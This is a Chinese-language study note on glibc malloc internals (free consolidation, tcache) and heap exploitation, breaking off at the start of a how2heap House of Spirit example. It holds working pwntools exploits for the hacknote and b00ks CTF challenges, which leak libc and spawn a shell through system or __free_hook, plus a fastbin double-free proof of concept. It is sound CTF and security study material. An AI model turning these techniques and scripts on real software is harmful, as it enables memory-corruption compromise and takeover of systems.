前向合并 - 下一块不是 top chunk, 放入unsorted

需要注意的是，如果下一块不是 top chunk ，则合并，并将合并后的 chunk 放入到 unsorted bin 中。

// 如果下一个chunk不是top chunk
if (nextchunk != av->top) {
    /* get and clear inuse bit */
    // 获取下一个 chunk 的使用状态
    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
    // 如果不在使用，合并，否则清空当前chunk的使用状态。
    /* consolidate forward */
    if (!nextinuse) {
        unlink(av, nextchunk, bck, fwd);
        size += nextsize;
    } else
        clear_inuse_bit_at_offset(nextchunk, 0);

    /*
  Place the chunk in unsorted chunk list. Chunks are
  not placed into regular bins until after they have
  been given one chance to be used in malloc.
    */
    // 把 chunk 放在 unsorted chunk 链表的头部
    bck = unsorted_chunks(av);
    fwd = bck->fd;
    // 简单的检查
    if (__glibc_unlikely(fwd->bk != bck)) {
        errstr = "free(): corrupted unsorted chunks";
        goto errout;
    }
    p->fd = fwd;
    p->bk = bck;
    // 如果是 large chunk，那就设置nextsize指针字段为NULL。
    if (!in_smallbin_range(size)) {
        p->fd_nextsize = NULL;
        p->bk_nextsize = NULL;
    }
    bck->fd = p;
    fwd->bk = p;

    set_head(p, size | PREV_INUSE);
    set_foot(p, size);

    check_free_chunk(av, p);
}

下一块是 top chunk - 合并到 top chunk

/*
  If the chunk borders the current high end of memory,
  consolidate into top
*/
// 如果要释放的chunk的下一个chunk是top chunk，那就合并到 top chunk
else {
    size += nextsize;
    set_head(p, size | PREV_INUSE);
    av->top = p;
    //只用于DEBUG:
    check_chunk(av, p);
}

向系统返还内存

        /*
          If freeing a large space, consolidate possibly-surrounding
          chunks. Then, if the total unused topmost memory exceeds trim
          threshold, ask malloc_trim to reduce top.

          Unless max_fast is 0, we don't know if there are fastbins
          bordering top, so we cannot tell for sure whether threshold
          has been reached unless fastbins are consolidated.  But we
          don't want to consolidate on each free.  As a compromise,
          consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
          is reached.
        */
         // 如果合并后的 chunk 的大小大于FASTBIN_CONSOLIDATION_THRESHOLD
         // (一般合并到 top chunk 都会执行这部分代码)
         // 那就向系统返还内存
        if ((unsigned long) (size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
            // 如果有 fast chunk 就进行合并
            if (have_fastchunks(av)) malloc_consolidate(av);
            // 主分配区
            if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
                // top chunk 大于当前的收缩阙值
                if ((unsigned long) (chunksize(av->top)) >=
                    (unsigned long) (mp_.trim_threshold))
                    systrim(mp_.top_pad, av);
#endif      // 非主分配区，则直接收缩heap
            } else {
                /* Always try heap_trim(), even if the top chunk is not
                   large, because the corresponding heap might go away.  */
                heap_info *heap = heap_for_ptr(top(av));

                assert(heap->ar_ptr == av);
                heap_trim(heap, mp_.top_pad);
            }
        }

        if (!have_lock) {
            assert(locked);
            __libc_lock_unlock(av->mutex);
        }

释放 mmap 的 chunk

} else {
    //  If the chunk was allocated via mmap, release via munmap().
    munmap_chunk(p);
}

tcache

两个struct

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;	//指向的user-date部分嗷
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread char tcache_shutting_down = 0;
static __thread tcache_perthread_struct *tcache = NULL;

每个 thread 都会维护一个 tcache_perthread_struct，它是整个 tcache 的管理结构，一共有 TCACHE_MAX_BINS 个计数器和 TCACHE_MAX_BINS项 tcache_entry，其中

tcache_entry 用单向链表的方式链接了相同大小的处于空闲状态（free 后）的 chunk，这一点上和 fastbin 很像。
counts 记录了 tcache_entry 链上空闲 chunk 的数目，每条链上最多可以有 7 个 chunk。

注意!!

2.29开始tcache_entry的结构发生改变:

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

tcache的chunk管理是通过mem指针操作的, 所以有个chunk2mem()函数在开头.

基本宏定义

/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
   idx 1   bytes 25..40 or 13..20
   idx 2   bytes 41..56 or 21..28
   etc.  */

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7

Tcache为每个线程都预留了这样一个特殊的bins， bin的数量是64个每个bin中最多缓存7个chunk。在64位系统上以0x10的字节递增，从24递增到1032字节。32位系统上则从12到512字节，所以Tcache缓存的是非Large Chunk的chunk

工作方式

第一次 malloc 时，会先 malloc 一块内存用来存放 tcache_perthread_struct 。
free 内存，且 size 小于 small bin size 时
tcache 之前会放到 fastbin 或者 unsorted bin 中
tcache 后：
- 先放到对应的 tcache 中，直到 tcache 被填满（默认是 7 个）
- tcache 被填满之后，再次 free 的内存和之前一样被放到 fastbin 或者 unsorted bin 中
- tcache 中的 chunk 不会合并（不取消 inuse bit）
malloc 内存，且 size 在 tcache 范围内
先从 tcache 取 chunk，直到 tcache 为空
tcache 为空后，从 bin 中找
tcache 为空时，如果 fastbin/smallbin/unsorted bin 中有 size 符合的 chunk，会先把 fastbin/smallbin/unsorted bin 中的 chunk 放到 tcache 中，直到填满。之后再从 tcache 中取；因此 chunk 在 bin 中和 tcache 中的顺序会反过来

各个函数中关于tcache的部分

tcache_init

tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);
    
  if (tcache_shutting_down)
    return;
    
  arena_get (ar_ptr, bytes); // 找到可用的 arena
  victim = _int_malloc (ar_ptr, bytes); // 申请一个 sizeof(tcache_perthread_struct) 大小的 chunk
  if (!victim && ar_ptr != NULL)	//这是.....不成功再来一遍?????
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }
  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);
    
  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
    //注释说如果取不到的话就等会再试, 通常在内存空间小的情况下
  if (victim) // 初始化 tcache
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }
}

#define MAYBE_INIT_TCACHE() \
  if (__glibc_unlikely (tcache == NULL)) \
    tcache_init();

–libc-malloc

void *
__libc_malloc (size_t bytes)
{
    ......
    ......
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  // 根据 malloc 传入的参数计算 chunk 实际大小，并计算 tcache 对应的下标
  checked_request2size (bytes, tbytes);
  size_t tc_idx = csize2tidx (tbytes);

  // 初始化 tcache
  MAYBE_INIT_TCACHE (); //如果为空就执行初始化函数
  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins  // 根据 size 得到的 idx 在合法的范围内
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL) // tcache->entries[tc_idx] 有 chunk
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
    ......
    ......
}

_int_malloc 2.36

（1）首先，申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中。

#if USE_TCACHE
	      /* While we're here, if we see other chunks of the same size,
		 stash them in the tcache.  */
	      size_t tc_idx = csize2tidx (nb);
	      if (tcache && tc_idx < mp_.tcache_bins)
		{
		  mchunkptr tc_victim;

		  /* While bin not empty and tcache not full, copy chunks.  */
		  while (tcache->counts[tc_idx] < mp_.tcache_count
			 && (tc_victim = *fb) != NULL)
		    {
		      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
			malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
		      if (SINGLE_THREAD_P)
			*fb = REVEAL_PTR (tc_victim->fd);
		      else
			{
			  REMOVE_FB (fb, pp, tc_victim);
			  if (__glibc_unlikely (tc_victim == NULL))
			    break;
			}
		      tcache_put (tc_victim, tc_idx);
		    }
		}
#endif

（2）其次，申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中。source

（3）当在 unsorted bin 链上循环处理时，当找到大小一致的chunk时，并不直接返回，而是先放到 tcache 中，继续处理。source

(4) unsorted bin大循环里如果达到放入tcache块达到最大数量，会立即返回。默认是 0，即不存在上限。

(5) 在循环处理 unsorted bin 内存块后，如果之前曾放入过 tcache 块，则会取出一个并返回。通过return_cached变量.

tcache_get()

看一下 tcache_get()

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]); // 获得一个 chunk，counts 减一
  return (void *) e;
}

//2.31
/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

tcache_get() 就是获得 chunk 的过程了。可以看出这个过程还是很简单的，从 tcache->entries[tc_idx] 中获得第一个 chunk，tcache->counts 减一，几乎没有任何保护。
少掉的两个assert在调用函数之前已经检查过, 写了个appease gcc, 就当是不存在吧.

__libc_free()

看完申请，再看看有 tcache 时的释放

void
__libc_free (void *mem)
{
  ......
  ......
  MAYBE_INIT_TCACHE ();
  ar_ptr = arena_for_chunk (p);
  _int_free (ar_ptr, p, 0);
}

__libc_free() 没有太多变化，MAYBE_INIT_TCACHE () 在 tcache 不为空失去了作用。

_int_free()

跟进 _int_free()

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  ......
  ......
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache
        && tc_idx < mp_.tcache_bins // 64
        && tcache->counts[tc_idx] < mp_.tcache_count) // 7
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif
  ......
  ......

判断 tc_idx 合法，tcache->counts[tc_idx] 在 7 个以内时，就进入 tcache_put()，传递的两个参数是要释放的 chunk 和该 chunk 对应的 size 在 tcache 中的下标。

tcache_put()

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

tcache_puts() 完成了把释放的 chunk 插入到 tcache->entries[tc_idx] 链表头部的操作，也几乎没有任何保护。并且 没有把 p 位置零。

利用之处

tcache poisoning: 就是简单的修改next指针.
tcache dup: 多次释放
smallbin unlink: 在smallbin中遍历找到chunk时也会将其他相同大小的chunk放到tcache, 然而缺少检查. 不熟悉
tcache stashing unlink attack: 不熟悉

UAF

原理

简单的说，Use After Free 就是其字面所表达的意思，当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况

内存块被释放后，其对应的指针被设置为 NULL ，然后再次使用，自然程序会崩溃。
内存块被释放后，其对应的指针没有被设置为 NULL ，然后在它下一次被使用之前，没有代码对这块内存块进行修改，那么程序很有可能可以正常运转。
内存块被释放后，其对应的指针没有被设置为 NULL，但是在它下一次使用之前，有代码对这块内存进行了修改，那么当程序再次使用这块内存时，就很有可能会出现奇怪的问题。

而我们一般所指的 Use After Free 漏洞主要是后两种。此外，我们一般称被释放后没有被设置为 NULL 的内存指针为 dangling pointer。

例子 – pwnable.tw_hacknote

题目在这里下载

# root @ Kiprey in ~/Desktop/Pwn [14:16:43]
$ checksec hacknote  
[*] '/root/Desktop/Pwn/hacknote'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

关键函数

add

unsigned int add()
{
  int v0; // ebx
  int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf[8]; // [esp+14h] [ebp-14h] BYREF
  unsigned int v5; // [esp+1Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  if ( dword_804A04C <= 5 )  //最多放五个chunk
  {
    for ( i = 0; i <= 4; ++i )
    {
      if ( !*(&ptr + i) ) //如果该位置为空, 猜测应该是一个数组, 元素是指向chunk的指针
      {
        *(&ptr + i) = malloc(8u); //malloc了八字节
        if ( !*(&ptr + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_DWORD *)*(&ptr + i) = sub_804862B; 
        printf("Note size :");
        read(0, buf, 8u);
        size = atoi(buf);
        v0 = (int)*(&ptr + i);
        *(_DWORD *)(v0 + 4) = malloc(size); //这里可以知道数组元素指向一个结构体, 这个结构体有两个指针
          //第一个是函数sub_804862B的指针, 第二个是content指针,malloc出来的
        if ( !*((_DWORD *)*(&ptr + i) + 1) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Content :");
        read(0, *((void **)*(&ptr + i) + 1), size);
        puts("Success !");
        ++dword_804A04C;
        return __readgsdword(0x14u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readgsdword(0x14u) ^ v5;
}

delete

unsigned int sub_80487D4()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= dword_804A04C )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&ptr + v1) )
  {
    free(*((void **)*(&ptr + v1) + 1));//先freecontent
    free(*(&ptr + v1));	//再free chunk
    puts("Success"); //并未设置NULL
  }
  return __readgsdword(0x14u) ^ v3;
}

print

unsigned int print()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= dword_804A04C )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&ptr + v1) )
    //&ptr + v1是函数指针的地址,解引用后得到改地址上的函数指针, 前面的是函数头
    //就是调用存在改地址的put函数
    (*(void (__cdecl **)(_DWORD))*(&ptr + v1)) (*(&ptr + v1));
  return __readgsdword(0x14u) ^ v3;
}

分析

UAF--use after free, 要在free后再次使用一般是在free后指针并未设置为NULL. 这是UAF一个很明显的标志
这里的delete函数中就没有在free后面设置NULL, 我们可以利用fastbin链的特性，来使一个可修改的指针指向某个被释放的note的func成员指针，进而修改该指针并执行其指向的函数
过程分析:
1. 我们可以先声明两个note，分别称为note0、note1，注意这两个note的content size必须>12，这样content chunk^[1]的大小就会大于 note chunk^[2]的大小 . 此时note chunk的user size为(8+4)bytes, content chunk的user size为(申请的大小+4)
```
如此，当这两个note都被释放时，两个note的note chunk会放置进相同索引的fast bin链里，而另外两个content chunk则会放置进 **另一个索引** 的fast bin链里。 note chunk 和 content chunk 在fast bin链中互不干扰
```
1. 第二步就是新建一个新的note2，注意该note的content size要<=12分配到fastbin上note1的空间，成为note2的content chunk
2. 注意：当程序可以执行system函数时，注意传入的地址为note2的地址，所以[system addr] 以及其后4个字节都会被解释成字符串尝试执行。但[system addr]又必须保留，那该如何get shell呢？
  这里有个小技巧，我们可以在最后四个字节构造"||sh"。这样便会执行system("[system addr]||sh")
  由于[system addr]肯定执行失败，所以便会执行到后面的sh。这样便可以get shell

解决方案

新建note0、note1，其note size必须大于12
释放note0、note1
新建note2，其note size必须<=12。

此时note2->content指针就会指向note1，在新建的过程中，便可修改内存上的内存。
- 修改note1->func为puts()函数（func指针默认设置的函数)
- 修改note1->content为got@__libc_start_main（随便哪个已经延迟绑定过的函数都行）
输出note1的内容（print note1），从而泄露libc基地址，进而确定system函数的地址
释放note2并重新建立note2，其note size仍然必须<=12

在建立note2过程中，修改以下内容
- 修改note1->func为system函数
- 修改note1->content为"||sh"字符串
输出note1的内容（print note1）执行system(“sh”)， get shell！

EXP

# -*- coding: utf-8 -*-
from pwn import *

io = remote("chall.pwnable.tw", 10102)

libc = ELF("./libc_32.so.6")
e = ELF("./hacknote")

context(terminal=['gnome-terminal', '-x', 'bash', '-c'], os='linux', arch='x86')
# context.log_level = 'debug'

def addnote(len, content):
    io.sendlineafter("Your choice :", "1")
    io.sendlineafter("Note size :", str(len))
    io.sendlineafter("Content :", content)

def delnote(index):
    io.sendlineafter("Your choice :", "2")
    io.sendlineafter("Index :", str(index))

def printnote(index):
    io.sendlineafter("Your choice :", "3")
    io.sendlineafter("Index :", str(index))

# 新建note0和note1并删除，注意删除顺序
addnote(16, '')
addnote(16, '')
delnote(1)
delnote(0)
# 新建note2，写入数据并执行
addnote(8, flat(0x0804862B, e.got['read']))
printnote(1)
 # 上一步泄露出了libc地址，处理得到system函数地址
libc_read_addr = u32(io.recv(4))
log.success('libc read addr: ' + hex(libc_read_addr))
# 删除note2
delnote(2)

libcbase_addr = libc_read_addr - libc.symbols['read']
system_addr = libcbase_addr + libc.symbols['system']

log.success('libcbase addr: ' + hex(libcbase_addr))
log.success('system addr: ' + hex(system_addr))
# gdb.attach(io)
# 重新建立note2，写入system地址和'||sh'字符串，执行函数
addnote(8, flat(system_addr, '||sh')) # 8或者12都是可以的

printnote(1)
# get shell！
io.interactive()

Off-by-one

溢出字节为可控制任意字节：通过修改大小造成块结构之间出现重叠，从而泄露其他块数据，或是覆盖其他块数据。也可使用 NULL 字节溢出的方法
溢出字节为 NULL 字节：在 size 为 0x100 的时候，溢出 NULL 字节可以使得 prev_in_use 位被清，这样前块会被认为是 free 块。（1）这时可以选择使用 unlink 方法（见 unlink 部分）进行处理。（2）另外，这时 prev_size 域就会启用，就可以伪造 prev_size ，从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的大小与prev_size 是否一致。

最新版本代码中，已加入针对 2 中后一种方法的 check ，但是在 2.28 及之前版本并没有该 check 。

/* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      /* 后两行代码在最新版本中加入，则 2 的第二种方法无法使用，但是 2.28 及之前都没有问题 */
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

在 libc-2.29 之后

由于这两行代码的加入

1 2	`if (__glibc_unlikely (chunksize(p) != prevsize)) malloc_printerr ("corrupted size vs. prev_size while consolidating");`

由于我们难以控制一个真实 chunk 的 size 字段，所以传统的 off-by-null 方法失效。但是，只需要满足被 unlink 的 chunk 和下一个 chunk 相连，所以仍然可以伪造 fake_chunk。

伪造的方式就是使用 large bin 遗留的 fd_nextsize 和 bk_nextsize 指针。以 fd_nextsize 为 fake_chunk 的 fd，bk_nextsize 为 fake_chunk 的 bk，这样我们可以完全控制该 fake_chunk 的 size 字段（这个过程会破坏原 larg e bin chunk 的 fd 指针，但是没有关系），同时还可以控制其 fd（通过部分覆写 fd_nextsize）。通过在后面使用其他的 chunk 辅助伪造，可以通过该检测

1 2	`if (__glibc_unlikely (chunksize(p) != prevsize)) malloc_printerr ("corrupted size vs. prev_size while consolidating");`

然后只需要通过 unlink 的检测就可以了，也就是 fd->bk == p && bk->fd == p

如果 large bin 中仅有一个 chunk，那么该 chunk 的两个 nextsize 指针都会指向自己，如下

我们可以控制 fd_nextsize 指向堆上的任意地址，可以容易地使之指向一个 fastbin + 0x10 - 0x18，而 fastbin 中的 fd 也会指向堆上的一个地址，通过部分覆写该指针也可以使该指针指向之前的 large bin + 0x10，这样就可以通过 fd->bk == p 的检测。

由于 bk_nextsize 我们无法修改，所以 bk->fd 必然在原先的 large bin chunk 的 fd 指针处（这个 fd 被我们破坏了）。通过 fastbin 的链表特性可以做到修改这个指针且不影响其他的数据，再部分覆写之就可以通过 bk->fd==p 的检测了。

然后通过 off-by-one 向低地址合并就可以实现 chunk overlapping 了，之后可以 leak libc_base 和堆地址，tcache 打 __free_hook 即可。

示例: Asis CTF 2016 b00ks

先patch成glibc 2.27的版本. 只要小于2.29都一个样.

一进入程序先要求设置author name, 还可以通过change功能来更改, 最长为32. 不过在stdin_read函数中边界检查不正确导致结尾空字符溢出.

create里malloc流程: name->description->book. 前两个为自己设定, 最后一个为0x20字节.

通过查看data中变量布局可以看到author name在slot_array上方, 这个array存的是一堆book类型的指针, 这个结构体使用malloc来分配空间:

struct book{
    int id;		//占8字节, 对齐
    char* name;
    char* description;
    int size;
};

所以先让author name的结尾空字符溢出到book1的指针最低字节, 然后读取出detail就会连带打印出book1的指针, 这样就泄露出了一个堆地址.

还可以通过清空最低字节来使指针指向我们控制的一个堆块(比如说通过edit修改的desc), 这样会自动认为那是一个book结构体, 从而在print时解引用name和desc指针, 打印出相应地址上的值. 还可以在edit中修改desc指向的地址, 从而达到了任意地址读写的能力.

具体过程如下:

程序刚开始, 第一个malloc会从0x5633ca39c260开始. 注意到最后三位是0x260.
为了实现利用, 要让book1的desc mem ptr(和chunk ptr相对, 联系chunk2mem)的最低字节为0x00.
最近的地址肯定是0x300, 所以desc chunk ptr为0x2f0, 留给name chunk的大小为0x90.
0x90需要我们申请0x80的空间. 即create(0x80, 'a', 0x50, 'a')

gdb中查看, 一通操作后book1的指针最低字节清空后刚好是book1的desc用户指针:

然后在desc里面伪造一个book结构体, name和desc均可用来任意读, desc能用来任意写(通过edit).

通过一个堆地址可以推断出elf基地址和其他chunk的相对位置, 接下来的方法比如说__free_hook, free_got(因为FULL RELRO导致不可用). 需要libc基地址, 有两种方法:

通过mmap, 这样分配的chunk会和libc有固定偏移.
通过largebin的fd_nextsize. 只有一组大小相同的元素时会指向libc中的large head.

只有在topchunk(一般是这样, 题目刚开始的时候top chunk是最大的chunk, 只要申请比这大的chunk即可实现mmap分配)不够用的时候才会使用mmap, 通过gdb看到topchunk一开始是0x21000. 由于开头两个chunk被用来存管理heap的结构体, 所以直接申请0x21000的堆块即可. 还要将name或desc写成'/bin/sh'

申请后:

name和desc分别分到了这两个位置:

注意到申请的是0x21000, 实际大小是0x22000, 这是因为加上header的0x10字节后进行page对齐的结果.

由于发现ld.so之后的两个anonym之间有空隙, 空隙大小随机化, mmap大概率放在空隙之后的anonym中, 导致到libc.so的偏移不是固定值. 如果随机化后结果都放在ld.so中间, 那么应该是可行的, 不过要多尝试几次.

到这里的流程如下:

对book1的desc fake chunk进行修改, 进行一次任意读, 读取book2的name的值. 这个name地址用之前leak的book1地址加上一个偏移即可
两个book的chunk紧挨着的, 这个偏移为0x38, 和0x40, 即可定位到book2的name和desc指针的地址.
然后找到__free_hook
使用desc任意写覆盖__free_hook为system,
执行delete
成功shell.

from numpy import lib
from pwn import *
binary = './b00ks'
context.binary = binary
context.log_level = 'debug'
p = process(binary)
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv a
rn=lambda x:p.recv(x)       #recv n
itt=lambda :p.interactive()
sla=lambda x,y:p.sendlineafter(x,y)

def firstAuthorName(name:str):
    ru('name: ')
    sl(name)

def create(name_size, name, desc_size, desc):
    ru('> ')
    sl('1')
    ru(': ')
    sl(str(name_size))
    ru(': ')
    sl(name)
    ru(': ')
    sl(str(desc_size))
    ru(': ')
    sl(desc)

def change(authorName):
    ru('> ')
    sl('5')
    ru(': ')
    sl(authorName)

def edit(id: int, desc: bytes):
    ru('> ')
    sl('3')
    ru(': ')
    sl(str(id))
    ru(': ')
    sl(desc)
    left = rl()+rl()
    if b'Unable' in left:
        log.error('aslr not match expection!')

def get_detail() -> tuple[int, bytes, bytes, bytes]:
    '''only support get first book!!'''
    ru(b'> ')
    sl(b'4')
    line = rl()
    id = int.from_bytes(line[4:], byteorder='little')
    name = rl()[6:]
    desc = rl()[len('Description: '):]
    author =  rl()[len('Author: '):]
    return id, name, desc, author

def delete(id):
    ru('> ')
    sl('2')
    ru(': ')
    sl(str(id))

#main function!!!
def main():
    firstAuthorName(cyclic(32))
    create(0x80, 'a', 0x50, 'a')
    create(0x20000-0x10, '/bin/sh', 0x20000-0x10, '/bin/sh')
    id, name, desc, author = get_detail()
    book1_addr = int.from_bytes(author[32:32+6], byteorder='little')
    log.success(f'get book 1 struct pointer: {hex(book1_addr)}')

    # addr-0x60 point to itself in book1_desc
    payload = flat([1, book1_addr+0x38, book1_addr-0x60, 0x50])
    edit(1, payload)
    change(cyclic(32))
    id, name, desc, author = get_detail()
    book2_name_addr = int.from_bytes(name, byteorder='little') & 0xffffffffffff
    log.success(f'book2 name addr: {hex(book2_name_addr)}')

    libc = ELF('/glibs/2.27-3ubuntu1_amd64/libc-2.27.so')
    libc_base = book2_name_addr - 0x606010
    __free_hook_addr = libc_base + libc.symbols['__free_hook']
    system_addr = libc_base + libc.symbols['system']
    log.success(f'__free_hook: {hex(__free_hook_addr)}\t system_addr: {hex(system_addr)}')
    
    payload = flat([1, book1_addr+0x38+0x90, __free_hook_addr, 0x50])
    edit(1, payload)
    edit(1, pack(system_addr))
    delete(2)

    # gdb.attach(p)
    itt()


if __name__ == '__main__':
    main()

Chunk Extend and Overlapping

chunk extend 就是通过控制 size 和 pre_size 域来实现跨越块操作从而导致 overlapping
通过 extend 可以实现 chunk overlapping，通过 overlapping 可以控制 chunk 的 fd/bk 指针从而可以实现 fastbin attack 等利用

例题也是heapstorm2.

Fastbin Attack

几乎全为CTF-WiKi, 做了些修改以及添加了一点个人想法

介绍

fastbin attack 是一类漏洞的利用方法，是指所有基于 fastbin 机制的漏洞利用方法。这类利用的前提是：

存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞
漏洞发生于 fastbin 类型的 chunk 中

如果细分的话，可以做如下的分类：

Fastbin Double Free
House of Spirit
Alloc to Stack
Arbitrary Alloc

其中，前两种主要漏洞侧重于利用 free 函数释放真的 chunk 或伪造的 chunk，然后再次申请 chunk 进行攻击，后两种侧重于故意修改 fd 指针，直接利用 malloc 申请指定位置 chunk 进行攻击。

Fastbin Double Free

介绍

Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放，因此可以在 fastbin 链表中存在多次。这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块，相当于多个指针指向同一个堆块，结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果。

Fastbin Double Free 能够成功利用主要有两部分的原因

fastbin 的堆块被释放后 next_chunk 的 pre_inuse 位不会被清空
fastbin 在执行 free 的时候仅验证了 main_arena 直接指向的块，即链表指针头部的块。对于链表后面的块，并没有进行验证。

/* Another simple check: make sure the top of the bin is not the
       record we are going to add (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
}

例子

typedef struct _chunk
{
    long long pre_size;
    long long size;
    long long fd;
    long long bk;
} CHUNK,*PCHUNK;

CHUNK bss_chunk;

int main(void)
{
    void *chunk1,*chunk2,*chunk3;
    void *chunk_a,*chunk_b;

    bss_chunk.size=0x21;
    chunk1=malloc(0x10);
    chunk2=malloc(0x10);

    free(chunk1);
    free(chunk2);
    free(chunk1);

    chunk_a=malloc(0x10);
    *(long long *)chunk_a=&bss_chunk;
    malloc(0x10);
    malloc(0x10);
    chunk_b=malloc(0x10);
    printf("%p",chunk_b);
    return 0;
}

House Of Spirit

介绍

House of Spirit 是 the Malloc Maleficarum 中的一种技术。

该技术的核心在于在目标位置处伪造 fastbin chunk，并将其释放，从而达到分配指定地址的 chunk 的目的。

要想构造 fastbin fake chunk，并且将其释放时，可以将其放入到对应的 fastbin 链表中，需要绕过一些必要的检测，即

fake chunk 的 ISMMAP 位不能为 1，因为 free 时，如果是 mmap 的 chunk，会单独处理。
fake chunk 地址需要对齐， MALLOC_ALIGN_MASK
fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。
fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ，同时也不能大于av->system_mem 。
fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。

演示

这里就直接以 how2heap 上的例子进行说明，如下

#include <stdio.h>
#include <stdlib.h>

int main()
{
